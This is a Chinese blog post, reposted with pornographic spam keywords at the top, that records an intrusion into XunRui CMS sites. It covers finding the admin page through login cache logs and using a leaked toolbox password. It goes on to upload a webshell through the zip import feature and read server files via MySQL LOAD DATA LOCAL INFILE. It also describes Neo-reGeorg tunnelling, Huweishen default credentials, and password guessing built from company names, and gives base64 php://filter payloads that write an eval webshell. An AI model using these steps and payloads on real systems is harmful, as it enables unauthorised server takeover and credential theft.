欧美free性护士vide0shd,老熟女,一区二区三区,久久久久夜夜夜精品国产,久久久久久综合网天天,欧美成人护士h版

首頁綜合 正文
目錄

柚子快報邀請碼778899分享:網(wǎng)絡(luò)安全 迅睿CMS漏洞思考

柚子快報邀請碼778899分享:網(wǎng)絡(luò)安全 迅睿CMS漏洞思考

http://yzkb.51969.com/

遇到個靶機是迅睿CMS?:

某CMS漏洞總結(jié)_長白山攻防實驗室的博客-CSDN博客

后續(xù)補充:

一:后臺地址

默認(rèn)后臺為/admin.php

遇到的靶機是/houtai.php

目標(biāo)旁站存在備份 版本為5. 4,靶機也存在備份,版本為5.1

旁站情況:網(wǎng)站根目錄下存在 /www.zip

里面數(shù)據(jù)庫配置信息和后臺地址都是假的,

/tool/login.php? 是迅睿工具箱地址 這個的密碼是 wangbiao88,登錄進去可修改后臺密碼,后面找到后臺后一樣的密碼。

第一步:找后臺地址:

默認(rèn)地址和掃目錄沒發(fā)現(xiàn)后臺地址但發(fā)現(xiàn)個/houtai/的目錄路徑 就是沒去試/houtai.php

/houtai.php 這個后臺路徑是在

/cache/log/202206/04.php? ?(按照年月/日期)如果登錄了不管成功和失敗就會生成緩存文件,密碼錯誤會記錄錯誤的md5密碼,不管成功失敗都會記錄顯示用戶名登錄。我遇到成功了也記錄了。

通過此文件成功找到后臺地址。

默認(rèn)用戶名admin? ?密碼就是泄露的迅睿工具箱源代碼中的密碼?\tool\config\pwd.php

二:旁站拿shell

后臺拿shell:后臺"應(yīng)用"->“聯(lián)動菜單”->"導(dǎo)入"處可上傳zip文件

本地新建一個123文件夾 再建立一個123文件夾 再放入你的shell.php

壓縮之后 --導(dǎo)入??

shell路徑:抓包會返回 目錄 一般為

/cache/temp/linkage-import-file-1-1/123/123/shell.php?

/cache/temp/linkage-import-file-1-2/123/123/shell.php?

/cache/temp/linkage-import-file-1-3/123/123/shell.php?

三:嘗試提權(quán)

拿到webshell之后。護衛(wèi)神,不支持aspx及aspx php很多馬都殺,不能執(zhí)行命令,反彈也執(zhí)行不了。不能直接跨站,

mysql數(shù)據(jù)庫低權(quán)限也不能都文件。

1.? CREATE TABLE `bbs` (`bbs1` TEXT NOT NULL );?

2.? load data local infile '//home//opendb.php' into table bbs;

3.? LOAD DATA LOCAL INFILE '/home/opendb.php' into table bbs fields terminated by '' LINES TERMINATED BY '\0';? ?(轉(zhuǎn)義用這個)

網(wǎng)上護衛(wèi)神主機提權(quán), 那個6588端口(直接訪問是訪問不到的需要做socks代理),php文件獲取session 偽造cookie? 3x版本應(yīng)該可以,目標(biāo)4x版本測試了不行。

過程:上傳Neo-reGeorg

生成python neoreg.py generate -k pass@123 生成socks5? shell 上傳目標(biāo)服務(wù)器

?python neoreg.py -k pass@123 -u http://www.abcd.com/cache/temp/linkage/import-file-1-2/cc/cc/tunnel.php? (本機執(zhí)行)

安裝Proxifier -- ?127.0.0.1 ?1080 ?選擇瀏覽器進程,范圍為,內(nèi)網(wǎng)ip或目標(biāo)范圍(本機配置)

瀏覽器輸入 目標(biāo)地址:6588 即可成功訪問?護衛(wèi)神 控制臺

低版本默認(rèn)?管理帳戶:huweishen ?管理密碼:huweishen.com

高版本的是隨機的強密碼。

利用護衛(wèi)神 那個php腳本獲取到cookie是隨機的,3x版本應(yīng)該可以,4x不行。

修改cookies 可以使用瀏覽器cookies插件,也可以使用?

瀏覽器 按F12? 輸入document.cookie 會顯示cookies值?

輸入?document.cookie="獲取到cookies? 還有path值"? 回車 F5刷新即可修改cookies了。

四:目標(biāo)情況。

目標(biāo)情況:網(wǎng)站根目錄也存在備份/backupdata.zip? 但是dedecms的信息,沒啥用

其實:網(wǎng)站后臺登錄會記錄內(nèi)容寫緩存到php文件,文件路徑為:/cache/log/202206/04.php(按照年月/日期)閉合了但是被轉(zhuǎn)義了,沒能getshell,

按照別人總結(jié)的版本提示文件不存在,也沒拿到shell,

迅睿工具箱地址也沒有,后臺是猜進去的。

按照旁站的版本,構(gòu)造一樣的包提示的,導(dǎo)入不能getshell? 少導(dǎo)入那個upload模塊。(旁站是import_upload) 這個版本沒有只有import

旁站盡量搞.net的站點。

還有一個社工密碼生成的規(guī)則。

公司名:如湘潭創(chuàng)榮經(jīng)濟發(fā)展集團有限公司 :密碼就是chuangrou88 且存在用戶名chuangrou 那么他可能的用戶名有:

xtcf

xtcr

chuangfa

chuangrou

湘潭網(wǎng)丹互聯(lián)網(wǎng)集團有限公司官網(wǎng):密碼就是wangdan88 wdjt wangdan xtwd

根據(jù)關(guān)鍵字組合去生成弱口令字典

補充:PHP文件上傳繞過-死亡exit.txt

https://www.equinox.chat/archives/28/

payload1:

txt=aPD9waHAgQGV2YWwoJF9QT1NUWydzaGVsbCddKTs/Pg==&filename=php://filter/write=convert.base64-decode/resource=shell.php

payload2:

txt=PD9waHAgQGV2YWwoJF9QT1NUWydzaGVsbCddKTs/Pg==&filename=php://filter/write=string.strip_tags|convert.base64-decode/resource=shell.php

柚子快報邀請碼778899分享:網(wǎng)絡(luò)安全 迅睿CMS漏洞思考

http://yzkb.51969.com/

參考文章

評論可見,查看隱藏內(nèi)容

本文內(nèi)容根據(jù)網(wǎng)絡(luò)資料整理,出于傳遞更多信息之目的,不代表金鑰匙跨境贊同其觀點和立場。

轉(zhuǎn)載請注明,如有侵權(quán),聯(lián)系刪除。

本文鏈接:http://gantiao.com.cn/post/18987641.html

發(fā)布評論

您暫未設(shè)置收款碼

請在主題配置——文章設(shè)置里上傳

掃描二維碼手機訪問

文章目錄